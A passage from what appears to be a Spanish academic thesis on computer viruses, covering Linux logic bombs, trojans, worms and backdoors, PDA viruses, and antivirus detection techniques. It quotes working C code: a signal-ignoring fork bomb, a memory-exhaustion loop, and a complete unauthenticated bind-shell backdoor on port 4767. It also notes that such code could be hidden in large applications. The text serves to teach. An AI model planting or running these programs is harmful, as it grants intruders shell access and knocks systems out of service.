muy extendido, y se puede apostar que los virus que ataquen particiones desmontadas pronto representarán un significativo peligro para máquinas Linux (Blaess, 2005)8. Por otro lado se ha descubierto una vulnerabilidad en la rama 2.6 (versiones anteriores a la 2.6.13.2) que puede ser explotada por usuarios locales maliciosos para provocar denegaciones de servicio. Un usuario local puede realizar una gran cantidad de llamadas fget de tal forma que se desborde un contador de referencias y una llamada fput subsiguiente que puede provocar que se liberen recursos equivocados, lo que puede llagar a causar el cese de la ejecución del kernel. Los sistemas de multiproceso simétrico de 64 bits pueden verse también afectados, y se ha detectado además que la función de 32bits tiocgdev ioctl() en sistemas x86-64 contiene el mismo tipo de vulnerabilidad. (Canto, 2005)9. 7.3.1 Bombas Lógicas. Los daños que puede causar una bomba lógica cuando se ejecuta en un sistema Linux. Puede variar dependiendo del efecto buscado por el atacante y de los privilegios del usuario. En lo que concierne a la destrucción de archivos del sistema o a la lectura de datos confidenciales, se tienen dos casos. Si la bomba se ejecuta bajo la identidad de root, tendrá todo el poder en la máquina, incluyendo el borrado de cualquier partición y eventuales amenazas al hardware.

90

Si se ejecuta bajo cualquier otra identidad, no será más destructiva que lo que puede ser cualquier usuario sin privilegios por sí mismo. Sólo podrá destruir los datos pertenecientes a ese usuario. Es este caso, se debe hacer cargo de sus propios archivos. Un administrador de sistema cuidadoso hará muy pocas tareas cuando acceda como root, lo que reduce la probabilidad de lanzar una bomba lógica bajo esta cuenta. El sistema Linux es bastante bueno en la protección de accesos a los datos privados y al hardware, sin embargo es sensible a los ataques dirigidos a hacerlo inoperativo haciendo un consumo excesivo de los recursos. Por ejemplo, el siguiente programa en C es difícil de parar, incluso cuando se ejecuta como un usuario normal, ya que, si el número de procesos por usuario no está limitado, este "consumirá" todas las entradas disponibles de la tabla de procesos y evitará cualquier conexión que intente matarlo. #include <signal.h> #include <unistd.h> int main (void) { int i; for (i = 0; i < NSIG; i ++) signal (i, SIG_IGN); while (1) fork (); } Los límites que se pueden llegar a establecer para los usuarios (con la llamada de sistema setrlimit() y la función de shell ulimit() permiten acortar la vida de este tipo de programas, pero sólo actúan tras un tiempo en el que el sistema no está disponible. En este mismo orden, un programa como el siguiente utiliza toda la memoria disponible y entra en un bucle "disipando" los ciclos de CPU, perturbando el funcionamiento de los otros procesos. #include <stdlib.h> #define LG 1024 int main (void) { char * buffer; while ((buffer = malloc (LG)) != NULL) memset (buffer, 0, LG); while (1) ; }

91

Habitualmente este programa es aniquilado automáticamente por el mecanismo de gestión de memoria virtual en las últimas versiones del núcleo. Pero antes de esto, el núcleo puede matar otras tareas que requieran un montón de memoria y luego estén inactivas (como aplicaciones X11, por ejemplo). Además, los demás procesos que requieran memoria no la obtendrán, lo que a menudo les llevará a su terminación. Poner fuera de servicio características de red es algo simple, sobrecargando el correspondiente puerto con continuas peticiones de conexión. Existen soluciones para impedirlo pero no siempre están implementadas por el administrador. Vemos que bajo Linux, incluso si una bomba lógica se lanza por un usuario normal, no puede destruir ficheros que no le pertenezcan, pero puede causar algunas molestias. Es suficiente con combinar unos pocos fork(), malloc() y connect() para dejar deteriorado el sistema y los servicios de red (Blaess, 2005)8. 7.3.2 Caballos de Troya. En el mundo del software libre, desde el autor de una pieza de código hasta el usuario final sólo hay uno o dos intermediarios (digamos alguien encargado del proyecto y alguien dedicado a la distribución). Si se descubre un troyano es fácil encontrar al "culpable". En el mundo del software libre está por lo tanto bastante bien protegido contra los troyanos. Pero se habla del software libre como lo conocemos hoy en día, con proyectos claramente gestionados, programadores disponibles y sitios web de referencia. Esto está bastante lejos del shareware o el Freeware, sólo disponibles precompilados, distribuidos de forma anárquica por cientos de sitios web (o entregados en CD junto a revistas), donde el autor sólo es conocido por una dirección de correo fácil de falsificar; esto hace un verdadero de grupo de caballos de Troya. Se debe tener en cuenta que el hecho de tener el código fuente de una aplicación y compilarla no es garantía de seguridad. Por ejemplo una bomba lógica dañina puede estar escondida en el script "configure" (el que se llama durante "./configure; make") que habitualmente ¡ocupa unas 2000 líneas! Por último, pero no menos importante, si el código fuente de una aplicación está limpio y compila; esto no impide al Makefile esconder una bomba lógica, activándose durante el "make install" final, ¡que suele ejecutarse como root!. Por último, una importante parte de los virus y Troyanos dañinos en Windows, son macros ejecutadas cuando se consulta un documento. Los paquetes ofimáticos en Linux no pueden interpretar esas macros, al menos por ahora, y el usuario rápidamente tiene un exagerado sentimiento de seguridad. Puede llegar la ocasión en que esas herramientas sean capaces de ejecutar las macros Basic incluidas en el documento. El hecho de que los diseñadores dejen a estas macros ejecutar comandos en el sistema podrá ocurrir antes o después.

92

En este caso Los virus, y el efecto devastador estará limitado a los usuarios privilegiados, pero el hecho de no perder los archivos del sistema (disponibles en el CD de instalación, de todas formas), es un pequeñísimo consuelo para el usuario doméstico que acaba de perder todos sus documentos, sus códigos fuente, etc..., mientras su última copia de seguridad es de hace un mes. Existe siempre una forma de molestar al usuario, incluso sin hacer daño, a algunos archivos que requieren una interpretación. En Usenet, se puede ver, de vez en cuando, archivos comprimidos multiplicándose estos a sí mismos en un puñado de archivos hasta llegar a saturar el disco. Algunos archivos Postscript también pueden bloquear el intérprete (ghostscript o gv) despilfarrando tiempo de CPU. No hay daños, sin embargo hacen al usuario perder tiempo y causarle molestias (Blaess, 2005)8. 7.3.3 Gusanos. Linux no existía en 1988 cuando se produjo la difusión del Internet Worm; habría sido un objetivo a elegir para este tipo de ataque, la disponibilidad del código fuente del software libre hace la búsqueda de vulnerabilidades muy sencilla (desbordamiento de buffers, por ejemplo). La complejidad de que se escriba un gusano de "buena calidad" reduce el número de los realmente activos en Linux. La Tabla 3(Gusanos en Linux) presenta algunos, entre los que están los más extendidos estos gusanos explotan vulnerabilidades de servidores de red. Para las estaciones de trabajo ocasionalmente conectadas a Internet el riesgo es teóricamente menor que para los servidores permanentemente conectados. Sin embargo, la evolución de las formas de conexión proporcionadas a los usuarios domésticos (cable, SDL, etc) y la actual facilidad de implementación de los servicios de red (servidores HTTP, FTP anónimo, etc) implica que rápidamente estos pueden llegar a afectar a todos. Tabla 3. Gusanos en Linux Nombre Vulnerabilidades Notas Instala una puerta trasera (puerto TCP 10008) y un root-kit en la máquina invadida. Envía información del sistema a una dirección de correo en China. Cambia los ficheros index.html que encuentra Instala una puerta trasera en el sistema y envía información a direcciones de correo en China y USA. Instala una versión modificada de ps para esconder sus procesos. Worm se introduce como algo bueno, chequeando y eliminando las puertas abiertas por Lion.

Lion (1i0n) bind Ramen Adore (Red Worm) Cheese lpr, nfs, wu-ftpd bind, lpr, rpc, wuftpd Como Lion

93

Sobre los gusanos, se tiene en cuenta que su crecimiento es por un tiempo limitado. Sólo "sobreviven" replicándose de un sistema a otro, y ya que cuentan con las últimas vulnerabilidades descubiertas, la rápida actualización de las aplicaciones objetivo paran su propagación. En un futuro cercano, posiblemente los sistemas domésticos tendrán que consultar automáticamente sitios web de referencia (a diario) que tendrán que ser de confianza para encontrar esos parches de seguridad para las aplicaciones del sistema. Podría volverse necesario para impedir al usuario que trabaje todo el tiempo como administrador del sistema mientras que le permite beneficiarse de aplicaciones desarrolladas en red (Blaess, 2005)8. 7.3.4 Puertas Traseras. Las puertas traseras son un problema importante, incluso para el software libre. Por supuesto, cuando está disponible el código fuente de un programa se puede comprobar, en teoría, qué es lo que hace. En realidad muy pocos leen el contenido del archivo que se han descargado de Internet. Por ejemplo, el siguiente programa suministra una completa puerta trasera, su pequeño tamaño hace posible esconderla dentro de una aplicación suficientemente grande Este programa deriva de un ejemplo del libro ["Programmation systeme en C sous Linux", Eyrolles, 2000]. Ilustrando el mecanismo de un pseudo-terminal. El programa no es de fácil lectura ya que no se han incluido comentarios, para hacerlo más pequeño. La mayoría de los errores detectados también se eliminaron por la misma razón. Cuando se ejecuta, abre un servicio TCP/IP en el puerto mencionado al principio del programa (por defecto 4767) en todos los interfaces de red de la máquina. ¡Cada petición de conexión a ese puerto accederá directamente a un shell sin ninguna autentificación! (Blaess, 2005)8. #define _GNU_SOURCE 500 #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <termios.h> #include <unistd.h> #include <netinet/in.h> #include <sys/socket.h> #define ADRESSE_BACKDOOR INADDR_ANY #define PORT_BACKDOOR 4767 int main (void) { int sock; int sockopt; struct sockaddr_in adresse; /* dirección */

94

socklen_t longueur; /* longitud */ int sock2; int pty_maitre; /* pty_maestro */ int pty_esclave; /* pty_esclavo */ char * nom_pty; /* nombre_pty */ struct termios termios; char * args [2] = { "/bin/sh", NULL }; fd_set set; char buffer [4096]; int n; sock = socket (AF_INET, SOCK_STREAM, 0); sockopt = 1; setsockopt (sock, SOL_SOCKET, SO_REUSEADDR, & sockopt, sizeof(sockopt)); memset (& adresse, 0, sizeof (struct sockaddr)); adresse . sin_family = AF_INET; adresse . sin_addr . s_addr = htonl (ADRESSE_BACKDOOR); adresse . sin_port = htons (PORT_BACKDOOR); if (bind (sock, (struct sockaddr *) & adresse, sizeof (adresse))) exit (1); listen (sock, 5); while (1) { longueur = sizeof (struct sockaddr_in); if ((sock2 = accept (sock, & adresse, & longueur)) < 0) continue; if (fork () == 0) break; close (sock2); } close (sock); if ((pty_maitre = getpt()) < 0) exit (1); grantpt (pty_maitre); unlockpt (pty_maitre); nom_pty = ptsname (pty_maitre); tcgetattr (STDIN_FILENO, & termios); if (fork () == 0) { /* Hijo: ejecución de shell en el pseudo-TTY esclavo */ close (pty_maitre); setsid(); pty_esclave = open (nom_pty, O_RDWR); tcsetattr (pty_esclave, TCSANOW, & termios); dup2 (pty_esclave, STDIN_FILENO); dup2 (pty_esclave, STDOUT_FILENO); dup2 (pty_esclave, STDERR_FILENO);

95

execv (args [0], args); exit (1); } /* Padre: copia del socket al pseudo-TTY maestro y viceversa */ tcgetattr (pty_maitre, & termios); cfmakeraw (& termios); tcsetattr (pty_maitre, TCSANOW, & termios); while (1) { FD_ZERO (& set); FD_SET (sock2, & set); FD_SET (pty_maitre, & set); if (select (pty_maitre < sock2 ? sock2+1: pty_maitre+1, & set, NULL, NULL, NULL) < 0) break; if (FD_ISSET (sock2, &set)) { if ((n = read (sock2, buffer, 4096)) < 0) break; write (pty_maitre, buffer, n); } if (FD_ISSET (pty_maitre, &set)) { if ((n = read (pty_maitre, buffer, 4096)) < 0) break; write (sock2, buffer, n); } } return (0); } Incluyendo dicho código en una aplicación grande (por ejemplo sendmail) permanecerá escondido el tiempo suficiente para permitir infiltraciones piratas. Además, algunos son verdaderos maestros en el arte de esconder el funcionamiento de trozos de código, como los programas enviados todos los años al concurso del IOCC (International Obsfucated C Code Contest) por ejemplo. Las puertas traseras no deben ser consideradas sólo como posibilidades teóricas. Tales problemas se han encontrado realmente, por ejemplo en el paquete Piranha de la distribución Red-Hat 6.2, que aceptaba una contraseña por defecto. Los mecanismos de puerta trasera pueden esconderse de formas tan complejas que se vuelven indetectables para la mayoría.

96

Un caso típico es el de los sistemas de encriptación. Por ejemplo, el sistema SELinux, en funcionamiento, es una versión Linux donde la seguridad ha sido reforzada con parches suministrados por la NSA. Los desarrolladores de Linux que habían comprobado los parches suministrados dijeron que nada parecía sospechoso, pero nadie puede estar seguro y muy pocos tienen los conocimientos matemáticos suficientes para descubrir tales vulnerabilidades (Blaess, 2005)8. 7.4 VIRUS EN LAS PDAS Conforme se extienda el uso de los dispositivos inalámbricos, como los asistentes digitales personales y tiendan a integrarse a la dinámica cotidiana de los negocios, también se puede esperar que aumenten las amenazas contra estos equipos. Ya han aparecido programas maliciosos (PalmOS/Phage, PALM/Liberty, etc) tales como los Caballos de Troya dirigidos específicamente contra los dispositivos inalámbricos, los expertos ven un horizonte de riesgos a asumir en un mundo inalámbrico que cada vez alcanza un mayor auge. Las personas bien conectadas aprovechan los asistentes digitales personales. Pero su popularidad inquieta cada vez más a un buen número de especialistas los cuales se adelantan a clasificar los diversos problemas que puedan llegar a presentarse, y con ello diseñar políticas de prevención y escenarios de herramientas eficaces para afrontar la nueva situación. Con su difusión se incrementa la posibilidad de que estos artefactos que caben en la palma de la mano se conviertan en objetivo real de ataque de los más diversos códigos maliciosos, destinados a destruir los datos que contienen o hasta provocar efectos indeseables en su funcionamiento normal. No obstante, cabe aclarar que hasta el momento no se tienen virus para PDA´s que literalmente destruyan datos, estos solamente afectan a su sistema operativo y lo más que pueden hacer es obligar a su reinstalación. La mayoría de las PDAs operan con el sistema operativo PalmOS (diseñado por Palm), por ello, se puede decir que Palm tiene un mercado similar al de Microsoft en el campo de los sistemas operativos para computadoras personales. Aunque, esto no libra de peligro a los demás sistemas operativos que sean admisibles en este entorno.Los equipos Palm son ya acariciados como un preclaro blanco u objetivo sumamente tentador para los más diversos programadores de virus. Cuando el número de estos aparatos de mano llegue al grado en que las computadoras han penetrado en el mercado mundial, el riesgo de que proliferen los virus o Troyanos para ellas bien podrá alcanzar un rango de importancia. La estructura del sistema PalmOS al mismo tiempo impide y facilita un potencial ataque de virus. De hecho, no es tan fácil crear y propagar virus inalámbricos pues se tiene un sistema operativo simple y transparente y no hay tanta facilidad para su ocultamiento (lo cual no inhibe su creación, solamente hace que se retarde),

97

pero esta situación ha ido cambiando desde que estos dispositivos han ingresado a las redes informáticas. Palm no utiliza un sistema convencional de almacenamiento de datos. Por el contrario, está diseñado para que pueda trabajar óptimamente con un equipo de cómputo pese a su limitada capacidad. En un Palm, los datos son guardados en bloques llamados registros. Estos, al relacionarse entre sí se agrupan en bases de datos que, por ejemplo, representan cosas como los datos inscritos en la agenda. Cuando se trasladan archivos desde una computadora se debe estar seguro de hacer antes una revisión de que estos no contengan virus. Igualmente, una manera de proteger las PDAs es alentar a los usuarios para que las sincronicen en forma regular. Durante la sincronización los usuarios tienen la oportunidad de aceptar o rechazar cualquiera de las nuevas aplicaciones que intenten entrar a la Palm, permitiéndoles revisar estas aplicaciones para asegurarse de que provienen de fuentes conocidas y confiables. Dado que un usuario también debe regularmente guardar sus datos de respaldo de manera tal que si la información que está en la Palm se perdiese, ella pueda ser restaurada de manera rápida y fácil, es como nace la necesidad de antivirus para estos dispositivos (aunque de momento la demanda no sea tan alta) y poder cerrar así el círculo de seguridad idónea. Dependiendo de las características del virus que ataque a las PDAs, estos tendrán más o menos capacidad de propagación. En el caso de los sistemas PALM ya está comprobado que pueden crearse virus pero, al igual que ocurre en los Pocket PC, estos virus pueden eliminarse simplemente desconectando la batería (Moreno, 2005)46. A pesar de todo, se puede llegar a pensar en un sistema que fuese capaz de escribir sobre la Flash ROM de estos dispositivos ya que existen virus, como CIH, que pueden modificar memoria Flash ROM. En los dispositivos de mano, el virus podría transmitirse a través de la conexión utilizada para sincronizar la información con el PC de escritorio. En este caso, el virus no se eliminaría simplemente al desconectar la batería, sino que se necesitaría un sistema de actualización de la ROM. En el hipotético caso de que un virus que fuera capaz de modificar esa ROM, debería propagarse desde el PC de escritorio como, por ejemplo, un típico gusano de correo electrónico. Si esto ocurriera, el antivirus tradicional instalado en el ordenador con el que se está sincronizando la información detectaría la amenaza y la eliminaría.

98

Si un virus consiguiera entrar en uno de los dispositivos de los que estamos hablando, su propagación a otros sistemas sería realmente difícil. Todo depende de cómo esté conectado el sistema con su entorno, dándose los posibles casos en función de las conexiones de las que disponga: - Comunicación únicamente con el PC de escritorio. En los sistemas más básicos sin sistemas de comunicación WiFi o telefónicos- únicamente podría llegar a infectar el PC de escritorio al que se puede conectar, bien por USB, Serie, infrarrojos, Bluetooth, etc (Panda Software, 2005)55. - Comunicación inalámbrica de bajo alcance. En este caso, el virus podría propagarse cómoda y fácilmente. En sistemas WiFi la conexión es permanente y con coste cero para el usuario final, por lo que éste nunca se preocuparía por un consumo excesivo del ancho de banda que pudiera ocasionar un virus, señal más que evidente de infección en un dispositivo móvil. A este problema hay que añadir los Hot Spots que un hacker pudiera emplear para introducir un virus en una red, conservando el anonimato completamente. Bluetooth también ofrece este tipo de conexión, pero un usuario que supiera configurarlo adecuadamente no estaría en ningún momento expuesto a un peligro vírico. - Comunicación telefónica. En este caso habría que distinguir tres supuestos distintos: GSM, GPRS y 3G. En el caso de GSM, el usuario sí que podría detectar el uso indebido del sistema de comunicación del dispositivo, ya que la línea permanece ocupada e incluso el dispositivo mostraría su estado de comunicación. Sin embargo, si se trata de GPRS o 3G –con conexión permanente-, el usuario únicamente llegaría a detectar que algo está utilizando uno de los canales de comunicación si le prestara una especial atención o si la factura por consumo del ancho de banda se disparara en un determinado momento (Panda Software, 2005)56. - Virus de fichero. El API desarrollado para los dispositivos móviles no es en absoluto compatible con los API para otros sistemas. Ni Symbian, ni Pocket PC, ni PALM son capaces de ejecutar software pensado para otras plataformas que no sean específicamente las suyas. - Virus de Boot. El dispositivo está siempre arrancado, excepto cuando se acaba la batería o se fuerza un reinicio. En ese caso, el propio sistema efectúa una comprobación del sistema que impediría que el arranque con un virus de tipo boot se produjera, pero no por ningún motivo de seguridad, sino por el error en la comprobación de la integridad. - Virus de macro. Pocket PC incluye entre sus herramientas por defecto una versión de Word llamada “Pocket Word” y otra de Excel llamada “Pocket Excel”. La transferencia de información entre una y otra elimina las posibles macros que hubiera en los documentos. Únicamente se respetan las macros realizadas con

99

Excel 4.0 y almacenadas en la misma hoja de cálculo, pero no se convierten las funciones Auto_Deactivate, Auto_Activate, Auto_Close y Auto_Open, que son las que pueden encerrar peligro en Excel 4.0. - Gusanos Script. Pocket PC no incorpora intérprete de scripts, por lo que no se pueden ejecutar. Ante este panorama, podemos pensar que los virus en este tipo de dispositivos se encuentran aún en una fase realmente inicial, sin que hasta ahora se hayan dado casos reales de infecciones víricas (Panda Software, 2005)56. 7.4.1 Seguridad en dispositivos inalámbricos. El uso de la tecnología WAP (Wireless Application Protocol), que se ha convertido en el estándar por defecto, para que los teléfonos móviles puedan acceder a los datos de Internet, posee un conocido agujero de seguridad: el punto donde los datos van desde el cable al aire por transmisión inalámbrica. Con este inconveniente, denominado gateway WAP, los datos HTML deben ser descifrados y recodificados como WML (Wireless Markup Language), ya que estos van desde la codificación SSL (Secure Sockets Layer), que soporta HTML, hasta la codificación WTLS (Wireless Transport Level Security), que soporta WML. Si un hacker tiene acceso a dicho gateway, puede interceptar el tráfico descifrado antes de que sea devuelto. Se cree que este problema se encuentra en la versión WAP 2.0, pero determinados ingenieros de la comunidad WAP apuntan a redes como iMode, un sistema de NTT Mobile Communications Network. iMode utiliza HTML compacto y el cual es bastante aceptado en Japón, ya que permite a los dispositivos inalámbricos hablar directamente con los servidores Web (Correa, 2005)15. La lucha por desarrollar seguridad en los dispositivos inalámbricos se enfrenta con varios obstáculos, como la corta duración de la batería o la potencia limitada de procesamiento. “Añadir seguridad a un dispositivo portátil es un tema complejo", declara Alan Kessler, COO (Chief Operating Officer) de Palm, "Tiene que ser sencillo, elegante, sólidamente fiable y de bajo costo”. Para hacer esto sin la necesidad de un superordenador, los primeros indicios muestran que los vendedores renuncian a una rigurosa codificación para utilizar tecnologías de peso ligero, como es el caso de utilizar una codificación de 56 bits, en lugar de 128 bits para dispositivos inalámbricos. Por ejemplo, el kit de herramientas Bsafe de RSA para una codificación WTLS, utiliza tecnología multiprime, que sacrifica la seguridad en función del tamaño y el rendimiento. Por tanto, a pesar de que los vendedores aseguren las

100

transacciones, los dispositivos no son tan seguros. Esta falta de seguridad convierte a los dispositivos inalámbricos y teléfonos móviles en el blanco de los hackers, que intentarán desarrollar nuevos virus para las redes públicas. De hecho, la epidemia ya comenzó, cuando un virus, considerado de bajo riesgo, Timofonica enviaba mensajes a teléfonos móviles. A este hecho, para la mayoría de los vendedores, la solución para prevenir futuros ataques es sencilla y ya se encuentra disponible. Los certificaos inalámbricos funcionan con una PKI (public-key infraestructure) para dispositivos inalámbricos podría ser necesaria para que los usuarios puedan autentificar sus dispositivos. Los certificados podrían ser almacenados en un chip, integrado en el dispositivo o en fichas, como pequeñas tarjetas. Por ello, los vendedores quieren adaptar sus tecnologías PKI al mundo inalámbrico. De hecho, las compañías ya están trabajando con fabricantes de dispositivos para comercializar funciones PKI, directamente con sus productos. Los PDAs serían los primeros en integrar dichas soluciones, con seguros navegadores telefónicos. No obstante, llevará mucho tiempo desarrollar certificados lo suficientemente pequeños para dichos dispositivos, que sean además adaptables a los protocolos inalámbricos. Pero el hecho es que, aunque este objetivo se viera cumplido, los usuarios seguirían mostrándose escépticos, ya que la mayoría prefiere utilizar autorización por contraseña (Correa, 2005)15. 7.4.2 Antivirus en las PDAs. En la III Campaña de Seguridad en la Red, promovida por la Asociación de Internautas (AI), ofrecerá una solución antivirus para dispositivos PDA de Trend Micro, El antivirus podrá ser descargado del sitio web de la campaña, la aplicación de seguridad para agendas de mano, a la que se suman 'PC-Cillin' para inalámbricos 2.02, antivirus para los sistemas operativos 'Windows CE 3.0', 'Palm OS 3.1'. El antivirus para PDA cuenta con análisis en busca de virus a petición del usuario y un mantenimiento sencillo con actualizaciones a través de Internet. El director General de Trend Micro en España, Mario Velarde, explicó que para instalar la aplicación de seguridad, el usuario debe descargar el programa al computador y luego sincronizarlo con la PDA. Por otro lado la campaña de seguridad ofrece información sobre seguridad en redes inalámbricas, su definición, tipos de inseguridades y consejos sobre seguridad (Cibernauta, 2005)10.

101

Kaspersky Security para PDAs es una solución de dos niveles que protege los datos en las computadoras de bolsillo. El programa lo protege contra código malicioso y previene el acceso no autorizado a la información. Las opciones de seguridad adicional realzan un conjunto de funcionalidades estándar. protección antivirus para PDAs con Palm OS y Windows CE encripción de datos y protección de contraseñas actualizaciones del antivirus a través de Internet Usuarios de Windows CE pueden escanear tanto lugares de almacenaje de datos y tarjetas de memoria contra virus. El antivirus se actualiza automáticamente, dejándolo siempre protegido. Para PDAs con sistemas Palm, el programa monitorea todos los flujos de datos que actúan como vectores de infección: escaneo on-demand de archivos, tanto memoria RAM como de tarjetas de memoria, protegiendo así los datos transferidos mediante HotSync y Beam. El módulo Datasafe de Kaspersky protege datos confidenciales de usuarios no deseados. Usuarios de Windows CE pueden crear archivos protegidos con contraseña. Los datos en estos archivos quedarán encriptados, así asegurando la información. El módulo Datasafe para PDAs con sistemas Palm provee protección mediante contraseña y opciones de encripción, también la opción de bloquear el PDA si así lo desea el usuario (kaspersky, 2005)36. McAfee Wireless, es una solución de seguridad antivirus para dispositivos portátiles y de bolsillo que se conectan a la red, tales como Palm Pilots y PocketPCs. Cada vez que un dispositivo portátil se conecta a la red, es casi como si insertara un diskette en un PC. No sabe dónde ha estado o qué infecciones puede transmitir. A medida que millones de usuarios adoptan estos potentes dispositivos de bolsillo, crece la amenaza de infección a través de PDAs. VirusScan Wireless es un modo de protegerse contra tal amenaza. VirusScan Wireless proporciona además la protección cuando más se necesita durante la sincronización. El momento que supone mayor peligro para la red es la sincronización de los PDA con los PC. Es entonces cuando VirusScan Wireless analiza todos los archivos y elimina la posibilidad de infección. Para los dispositivos PalmOS, tales como Palm Pilots y Handspring Visors, el VirusScan Wireless ofrece exploración en el mismo dispositivo. Con la exploración en el dispositivo, VirusScan Wireless proteger la PDA contra infecciones incluso cuando se transfieren ficheros por infrarrojos o cuando se conecta a la red de modo inalámbrico. VirusScan Wireless es una de las soluciones que se ofrecen a para los equipos Palm en protección tanto en el dispositivo como al sincronizar (Mcafeeb2b, 2005)40.

102

8. TEORÍA DE ANTIVIRUS 8.1 DEFINICIÓN DE ANTIVIRUS Es importante aclarar que todo antivirus es un programa y que, como todo programa, sólo funcionará correctamente si es adecuado y está bien configurado. Además, un antivirus es una herramienta para el usuario y no sólo no será eficaz para el 100% de los casos, sino que nunca será una protección total ni definitiva. La función de un programa antivirus es detectar, de alguna manera, la presencia o la ejecución de un virus informático en una equipo. Este es el aspecto más importante de un antivirus, independientemente de los beneficios adicionales que pueda ofrecer, puesto que el hecho de detectar la posible presencia de un virus informático, detener su ejecución y tomar las medidas necesarias, es suficiente para acotar un buen porcentaje de los daños posibles. Adicionalmente, un antivirus ofrece la posibilidad de erradicar un virus informático de una entidad infectada. El modelo más primario de las funciones de un programa antivirus es la detección de su presencia y, en lo posible, su identificación. La primera técnica que se popularizó para la detección de virus informáticos, y que todavía se sigue utilizando (aunque cada vez con menos eficiencia), es el scanning. Esta técnica consiste en revisar el código de todos los archivos contenidos en la unidad de almacenamiento -fundamentalmente los archivos ejecutables- en busca de pequeñas porciones de código que puedan pertenecer a un virus informático. Este procedimiento se realiza empleando una base de datos que contiene fragmentos de código representativos de cada virus conocido, empleando también determinados algoritmos que agilizan los procesos de búsqueda. La técnica de scanning fue bastante eficaz en los primeros tiempos de los virus informáticos, cuando había pocos y su producción era pequeña. Este relativamente pequeño volumen de virus informáticos permitía que los desarrolladores de antivirus de scanning tuvieran tiempo de analizar el virus, extraer el fragmento de código usado para la identificación y agregarlo a la base de datos del programa para lanzar una nueva versión. Sin embargo, la obsolescencia de este mecanismo de identificación como una solución antivirus completa se encontró en su mismo modelo. La primera debilidad de este sistema radica en que siempre brinda una solución a posteriori: es necesario que un virus informático alcance un grado de dispersión considerable para que sea enviado (por usuarios capacitados, especialistas o distribuidores del producto) a los desarrolladores de antivirus. Estos lo analizarán, extraerán el fragmento de código necesario, y lo incluirán en la próxima versión de

103

su programa antivirus. Este proceso puede tomar meses a partir del momento en que el virus comienza a tener una dispersión considerable, tiempo en el que puede causar graves daños sin que pueda ser identificado. Además, este modelo consiste en una sucesión infinita de soluciones parciales y momentáneas (cuya sumatoria jamás constituirá una solución definitiva), que deben actualizarse periódicamente debido a la aparición de nuevos virus. En síntesis, la técnica de scanning es altamente ineficiente, pero se sigue utilizando debido a que permite identificar rápidamente la presencia de los virus más conocidos. En virtud del pronto agotamiento técnico de la técnica de scanning, los desarrolladores de programas antivirus han dotado a sus creaciones con métodos para búsquedas de virus informáticos (y de sus actividades), que no identifican específicamente al virus sino a algunas de sus características generales y comportamientos universalizados. Este tipo de método rastrea rutinas de alteración de información que no puedan ser controladas por el usuario, modificación de sectores críticos de las unidades de almacenamiento (master boot record, boot sector, FAT, entre otras), etc. Un ejemplo de este tipo de métodos es el que utiliza algoritmos heurísticos. De hecho, esta naturaleza de procedimientos busca, de manera bastante eficiente, códigos de instrucciones potencialmente nocivos. Resulta eficaz para la detección de virus conocidos y es una de las soluciones utilizadas por los antivirus para la detección de nuevos virus. El inconveniente que presenta este tipo de algoritmo radica en que puede llegar a sospecharse de muchas cosas que no son virus. Esto hace necesario que el usuario que lo utiliza conozca un poco acerca de la estructura del sistema operativo, para poder identificar las falsas alarmas generadas por el algoritmo heurístico. Algunos de los antivirus de esta clase son F-Prot, Norton Anti Virus y Dr. Solomon's Toolkit. Ahora bien, otra forma de detectar la presencia de un virus informático en un sistema consiste en monitorear las actividades de la PC señalando si algún proceso intenta modificar los sectores críticos de los dispositivos de almacenamiento o los archivos ejecutables. Los programas que realizan esta tarea se denominan chequeadores de integridad. Sobre la base de estas consideraciones, podemos consignar que un buen sistema antivirus debe estar compuesto por un programa detector de virus -que siempre esté residente en memoria- y un programa que verifique la integridad de los sectores críticos del disco rígido y sus archivos ejecutables. Existen productos antivirus que cubren los dos aspectos, o bien pueden combinarse productos diferentes configurados de forma que no se produzcan conflictos entre ellos.

104

8.2 ESTRUCTURA DEL PROGRAMA ANTIVIRUS Para comprender el funcionamiento de un programa antivirus es necesario estudiar los módulos que lo componen. 8.2.1 Módulo de identificación o de control. En este módulo se registran los cambios realizados por un virus en los programas ejecutables o en áreas críticas del disco duro, con este fin usa la técnica de verificación de integridad, de esta forma se controla la información en el disco duro buscando prevenir que sea modificada de acuerdo con los requerimientos del usuario únicamente. En este módulo también se realiza la identificación del virus, para lo cual existen varias técnicas como el scanning y los algoritmos heurísticos. La identificación de código nocivo encuentra líneas de código incluidas en programas que tengan como objetivo alterar la información del disco duro de manera nociva. Para esto es necesario descompilar o desensamblar el programa. La administración de recursos permite monitorear las rutinas de acceso a hardware del equipo, de esta forma se limita en gran manera el campo de acción de determinado programa limitando el uso de estos recursos para este programa que ha sido identificado previamente como potencialmente nocivo. Es posible, por ejemplo, impedir escribir o dar formato a ciertas áreas críticas del disco duro (Montesino, 2003)44. 8.2.2 Módulo de respuesta. El antivirus reacciona con una alarma que consiste en un aviso en la pantalla ante la presencia de un programa “sospechoso”. La función reparar se utiliza como solución temporal para mantener el sistema funcionando hasta implementar una solución más adecuada. Existen dos técnicas para evitar la infección de ejecutables, la primera es evitar que se infecte todo el programa y la segunda es limitar la infección a determinado ámbito. Los problemas de implementación de la primera técnica evitan que sea una buena opción a pesar de lo conveniente de su implementación. 8.3 TÉCNICAS PARA LA DETECCIÓN DE VIRUS INFORMÁTICOS 8.3.1 Scanning o rastreo. Fue la primera técnica que se popularizó para la detección de virus informáticos, y que todavía se utiliza -aunque cada vez con menos eficiencia. Consiste en revisar el código de todos los archivos ubicados en la unidad de almacenamiento - fundamentalmente los archivos ejecutables - en busca de pequeñas porciones de código que puedan pertenecer a un virus informático.

105

La primera debilidad de este sistema radica en que al detectarse un nuevo virus, este debe aislarse por el usuario y enviarse al fabricante de antivirus, la solución siempre será a posteriori: es necesario que un virus informático se disperse considerablemente para que se envíe a los fabricantes de antivirus. Estos lo analizarán, extraerán el trozo de código que lo identifica y lo incluirán en la próxima versión de su programa antivirus. Este proceso puede demorar meses a partir del momento en que el virus comienza a tener una gran dispersión, lapso en el que puede causar graves daños sin que pueda identificarse. Otro problema es que los sistemas antivirus deben actualizarse periódicamente debido a la aparición de nuevos virus. Sin embargo, esta técnica permite identificar rápidamente la presencia de los virus más conocidos y, al ser estos los de mayor dispersión, posibilita un alto índice de soluciones. (Montesino, 2003)44. 8.3.2 Comprobación de suma o CRC (Ciclyc Redundant Check). Es otro método de detección de virus. Mediante una operación matemática que abarca a cada byte del archivo, generan un número (de 16 ó 32 bytes) para cada archivo. Una vez obtenido este número, las posibilidades de que una modificación del archivo alcance el mismo número son muy pocas. Por eso, es un método tradicionalmente muy utilizado por los sistemas antivirus. En esta 